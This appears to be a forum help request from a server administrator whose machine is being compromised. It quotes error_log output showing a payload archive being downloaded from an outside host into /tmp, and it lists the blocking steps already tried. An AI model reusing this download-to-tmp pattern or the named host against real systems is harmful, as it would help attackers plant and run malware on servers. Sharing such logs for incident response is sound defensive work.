Help! Hacker gaining access to the server!
I have someone somehow getting into the server and spawning hundreds of processes, and I am unsure how he is doing it.
I found this in the error_log
cat: /tmp/sess_d68fb641e4e2ddb73c461a25e2039d2e: No such file or directory
kill: usage: kill [-s sigspec | -n signum | -sigspec] [pid | job]... or kill -l [sigspec]
sh: fetch: command not found
--04:10:26-- http://4goofs.com/ad13/archive.tgz
=> `/tmp/abchy6/archive.tgz'
Resolving 4goofs.com... done.
Connecting to 4goofs.com[216.93.174.4]:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.4goofs.com/ad13/archive.tgz [following]
--04:10:26-- http://www.4goofs.com/ad13/archive.tgz
=> `/tmp/abchy6/archive.tgz'
Resolving www.4goofs.com... done.
Connecting to www.4goofs.com[216.93.174.4]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,661 [application/x-tar]
0K .......... .......... ....... 100% 103.66 KB/s
04:10:26 (103.66 KB/s) - `/tmp/abchy6/archive.tgz' saved [28661/28661]
gzip: stdin: unexpected end of file
tar: Child returned status 1
tar: Error exit delayed from previous errors
gzip: stdin: not in gzip format
The file in archive.tgz is a file called httpd.conf which seems to be the program that he is running, but I blocked 4goofs yesterday using iptables, and blocked all open ports... changed the port SSH runs on and made sure no-one else on the server had SSH.
I changed the upload directory for php, but this guy still has access to the server.
What else should I be doing???
Please help, thank you
